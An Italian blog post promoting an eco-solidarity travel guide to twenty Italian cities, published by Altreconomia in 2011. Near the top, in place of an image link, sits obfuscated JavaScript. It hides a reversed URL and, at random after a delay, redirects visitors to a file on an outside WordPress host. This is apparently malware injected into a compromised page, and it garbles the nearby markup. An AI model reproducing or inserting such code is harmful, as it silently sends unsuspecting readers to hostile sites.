L’Italia che ci piace. Venti città da scoprire con una guida speciale: c'è anche Firenze

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/06/bambole_vestibili_d0.jpg”>
le bambole di Pantagruel, segnalate nella guida

E’ tempo di vacanze, di gite fuori porta e di visite in altre città… o anche, perché no, nella propria. Se siete attenti alla sostenibilità e alla solidarietà, se detestate il fast food, se rifuggite dai soliti circuiti del divertimento forzato e della cultura muffosa, non potete perdervi la “Guida all’Italia eco-solidale”. Pubblicata da Altreconomia Edizioni, la guida – nuova edizione riveduta e raddoppiata! – presenta itinerari e mappe di 20 città italiane, esplorate e raccontate da chi quelle città le vive e le conosce nelle loro pieghe. Autori e autrici dei 20 capitoli sono infatti legati ad associazioni e gruppi del territorio che si occupano di consumo critico, stili di vita, solidarietà e giustizia sociale. Per Firenze, ad esempio, l’autrice è direttore dell’Altracittà…

Ecco le venti città da scoprire nella loro anima “alternativa”: L’Aquila, Milano, Torino, Genova, Venezia, Vicenza, Treviso, Trento, Bolzano, Trieste, Bologna, Firenze, Roma, Napoli, Ferrara, Ancona, Perugia, Bari, Palermo, Cagliari. Per ognuna, la guida presenta un’ampia offerta di ostelli, bed & breakfast, agriturismo e accoglienze sociali, gestiti da cooperative sociali di inserimento al lavoro. Ristoranti e locali che servono prodotti bio, equosolidali, di filiera corta e a chilometro zero.
E ancora, tutta la cultura indipendente: cinema, teatro, musica, libri e gli eventi alternativi. La possibilità di incontrare le realtà e le comunità locali, vivere in prima persona gli eventi più caratteristici. I consigli per muoversi senza inquinare. E poi, le altre eccellenze “etiche”: botteghe del commercio equo, gruppi d’acquisto solidali, finanza etica, turismo responsabile. Infine uno sguardo ai “nuovi” cittadini con associazioni di migranti e multietniche.

Questo viaggio in Italia parte non a caso da L’Aquila, a due anni dal sisma del 6 aprile. Un segno di riscatto per una città che per risorgere sta puntando proprio sull’economia solidale.

“Guida all’Italia eco-solidale. Turismo responsabile in 20 città”, volume a colori con 20 mappe, costa 18 euro in libreria. Ma… attenzione! Sconto speciale per i primi 10 lettori dell’Altracittà che richiedono il volume al nostro indirizzo redazione@altracitta.org.

“Guida all’Italia eco-solidale. Turismo responsabile in 20 città”, a cura di Silvia Leone e Massimo Acanfora, 208 pp, 18 euro. Altreconomia 2011

In vendita in libreria, nelle botteghe del commercio equo e su www.altreconomia.it/libri.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *